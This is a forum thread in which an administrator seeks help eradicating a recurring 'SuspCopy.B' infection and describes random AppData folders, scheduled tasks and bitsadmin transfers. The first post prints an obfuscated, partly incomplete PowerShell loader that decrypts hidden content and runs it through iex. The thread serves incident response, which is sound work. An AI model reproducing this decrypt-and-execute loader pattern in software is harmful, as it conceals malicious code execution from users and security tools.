Microsoft Entra Suite Tech Accelerator
Aug 14 2024, 07:00 AM - 09:30 AM (PDT)
Microsoft Tech Community

Need help with suspicious "Behavior:Win32/SuspCopy.B"

Iron Contributor


the system of a colleague is trying to block various attempt of the threat classified as "Behavior:Win32/SuspCopy.B"; I found that the antivirus block it but after some times it find it again; the threath create a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory; as a side effect, every time that the antivurs find a new attempt, a pop up shows that a particular .tmp files is not found: the pop up is a wsh pop up and I suppose a vbscript is executed when there is this issue.

One of the file that I have found is a powershell script like this:


$kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi";
$NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"};
if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){
$FJZARstrPhaUvJ= Get-Content ""
$BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI;
$qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu);
$zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW);
$zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}

I also tried to do a scan with Microsoft Security Scanner but without a success.

Has someone any idea how I could eradicate this threath?




5 Replies
Interesting, does your colleague know the source of the script? Are you able to quarantine the file from defender atp console?

Hello @rs8091 

no, my colleague doesn't know how her system is infected. We activated the preview of Microsoft Defender Endpoint P1 and I can see this:


Threat 1.pngThreat 2.png

These are not generated by that file but I have seen that in many random directory that the threat create there is always a powershell file with that code inside.

I don't know if I can quarantine it.

Any help is appreciated.



Hello @rs8091 


thanks for your reply. I've seen the link and also on our dashboard but I don't see the possibility; we have activated the preview of Microsoft 365 Defender for Endpoint P1, I d.

I also see that the script that I copied on this forum, is not seen in the alert tree.


For what I see today, on my colleague C:\Users\[colleague_account]\AppData\Roaming there is a directory "obUwHjQXC" that has the following files as in the image:


Threat 3.png

I also see that every hour 30/60 minutes the svchost.temp is refreshed; also, I suppose that when Defender recognize the infection, the virus is blocked and so start the dialog in the image:


Threat 4.png

I tried to create again the directory and the file, even if empy because I don't know the contents of the .tmp file; after some time I checked and see that the file recreated remains empty and the dialog when the problem shows again is this:


Threat 6.png

Other thing that I noticed in past days, that the files 0_[something].log and 1_[something].log change every day: yesterday there si Teams, the day before Chrome.

This is what I see on the endpoint; instead, what I see on the alerts on the Defender dashboard is something like this in the picture (see that it seems that sometimes the virus uses the bitsdmin.exe to transfer data I don't know where):


Threat 5.png

The time is the same that I find on the pc. I also found many many entries in task scheduler: I now disactivated all the, I suppose, related to the threat, but I can't see nothing that can help me to understand what starts the virus


Threat 8.png

Hope this can help to understand better and help.


Thanks a lot.



Hello Marco,
if you click on the events in the ATP console (4th picture) on the right should open a panel with options how to remediate/block/quarantine the files. Is it available?